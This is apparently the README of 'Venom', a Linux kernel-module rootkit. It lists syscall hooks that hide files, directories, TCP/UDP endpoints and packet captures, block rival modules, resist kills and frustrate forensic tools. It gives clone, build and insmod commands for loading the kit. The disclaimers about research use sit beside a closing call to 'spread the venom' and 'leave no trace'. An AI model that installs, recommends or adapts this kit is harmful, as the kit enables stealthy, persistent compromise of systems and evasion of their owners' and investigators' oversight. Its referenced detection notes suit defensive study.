• Output interception — watches kernel write paths to protect or hide tracing/logs.
• Input interception — inspects reads to stop leaks of Venom internals.
• Dir filtering (64-bit) — hides files/dirs from normal ls/readdir views.
• Dir filtering (32-bit/compat) — same as above for 32-bit compatibility calls.
• Module load control — watches/blocks module insertions to stop rivals.
• FD-based module load — monitors modern (fd) module loads the same way.
• Module unload protection — prevents or logs attempts to remove modules.
• Signal control — intercepts signals to stop forced kills or meddling.
• Device/ioctl protection — blocks/inspects ioctl probes from forensic tools.
• TCP /proc hooks — filters /proc/net/tcp and /proc/net/tcp6 to hide endpoints.
• UDP /proc hooks — filters /proc/net/udp and /proc/net/udp6.
• Packet receive interception — filters raw packet capture paths (AF_PACKET/TPACKET).
• Mount blocking — denies unwanted mounts/moves to keep things hidden.
• FS protection hooks — hooks openat/renameat/unlinkat to guard critical files.
• Socket logging — logs new sockets (watch outbound channels).

git clone https://github.com/Trevohack/Venom
cd Venom
make
insmod venom.ko

• And let the venom spread

The docs folder contains the project's design and reference material. Quick links:

• Syscall Hooks (overview) — which hooks are monitored and why (non-operational)
• Diagrams — Flow and structure diagrams
• Detection — defensive signals, suggested audit checks, and safe test advice

Browse the docs: docs

Venom is not a weapon it’s a research & educational project.

✔️ Stay Responsible
Use this content only in safe, legal environments you fully control

✔️ Contribute for Good
Pull requests that improve documentation, defensive detection notes, or historical references are welcome. Contributions must follow the spirit of responsible research no weaponized code, no operational exploits.

✔️ Respect the Ecosystem
This repo is about knowledge-sharing, not misuse. Always respect the boundaries of ethical hacking and your local laws. When in doubt, don’t run it on production systems.

• Diamorphine - old kit but greatest inspiration
• TheXcellerator - learnt about LKMs first, mad respect
• MatheuZSecurity - inspiration, huge shout out
• Kvoid - Goat

Closing note:
Spread the venom. Leave no trace. Own the silence.